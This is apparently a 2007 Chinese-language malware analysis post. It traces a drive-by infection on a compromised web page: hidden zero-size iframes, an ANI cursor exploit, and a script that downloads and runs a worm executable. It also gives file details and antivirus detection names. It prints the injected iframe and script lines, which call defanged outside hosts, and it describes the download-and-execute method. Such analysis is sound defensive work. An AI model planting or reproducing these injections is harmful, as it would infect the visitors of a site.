endurer 原创
2007-04-12 第1版
网页被加入代码:
/-----
<iframe src=hxxp://www.xa**it*an.cn/mm/mm.htm width=0 height=0></iframe>
---/
mm.htm包含代码:
/---
<iframe src=hxxp://www.97***72*5.com/?01***6 width=0 height=0></iframe>
---/
hxxp://www.97***72*5.com/?01***6
包含代码:
/---
<BODY style='CURSOR: url(hxxp://www.97***72*5.com/m*uxiao***2.jpg)'></BODY>
<script src=hxxp://www.97***72*5.com/06****14.js></script>
---/
hxxp://www.97***72*5.com/m*uxiao***2.jpg(Kaspersky报为:Exploit.Win32.IMG-ANI.k)利用ANI漏洞下载97725.exe
hxxp://www.97***72*5.com/06****14.js
内容为JavaScript脚本代码,功能是利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 97725.exe,保存到 %windir%,文件名由函数
/---
function gn(n) { var number = Math.random()*n; return '~tmp'+'.tmp'; }
---/
生成,即~tmp.tmp。然后通过Shell.Application 对象 Q的 ShellExecute 方法 执行命令:%windir%/system32/cmd.exe /c %windir%/~tmp.tmp 来运行。
文件说明符 : D:/test/97725.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-4-11 12:54:18
修改时间 : 2007-4-11 12:59:23
访问时间 : 2007-4-11 12:6:24
大小 : 64645 字节 63.133 KB
MD5 : 8d5e8b2ba870f4d23a460ee5c9a2ca7d
Kaspersky报为:Worm.Win32.Viking.ix